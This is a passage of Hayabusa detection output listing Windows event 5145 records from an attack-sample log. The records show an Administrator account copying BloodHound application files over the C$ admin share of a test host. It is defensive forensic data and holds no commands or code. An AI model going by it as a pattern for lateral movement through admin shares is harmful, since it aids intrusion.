Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-transition-group | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.309 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-transition-group\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.309 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-transition-group\utils | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.309 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\readable-stream | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.319 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\readable-stream\doc | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.319 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\readable-stream\doc\wg-meetings | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.319 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\readable-stream\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.319 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\readable-stream\lib\internal | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.319 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\regenerator-runtime | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.329 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\resize-observer-polyfill | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.329 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\resize-observer-polyfill\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.329 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\resize-observer-polyfill\src | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.329 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\resize-observer-polyfill\src\shims | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.339 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\resize-observer-polyfill\src\utils | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.339 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\rimraf | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.339 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\safe-buffer | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.339 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\scheduler | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.339 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\scheduler\cjs | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.349 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\scheduler\umd | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.349 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\setimmediate | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.349 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\signal-exit | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.349 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\ssf | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.359 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\ssf\bin | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.359 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-chain | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.359 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-chain\tests | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.369 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-json | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.369 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-json\filters | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.369 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-json\streamers | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.379 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-json\tests | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.379 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-json\utils | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.379 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\string_decoder | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.389 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\string_decoder\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.389 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\text-encoding | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.389 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\text-encoding\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.399 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\traverse | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.399 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\traverse\examples | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.399 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\traverse\test | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.409 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\typedarray | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.409 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\typedarray\example | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.409 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\typedarray\test | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.409 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\typedarray\test\server | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.419 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\unzipper | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.419 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.419 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.419 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js\dist\es5 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.429 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js\dist\esnext | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.429 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js\src | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.429 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js\src\schemes | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.439 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js\tests | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.439 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\util-deprecate | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.439 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uuid | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.439 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uuid\bin | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.449 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uuid\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.449 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\voc | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.449 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\warning | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.449 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\wrappy | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.459 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 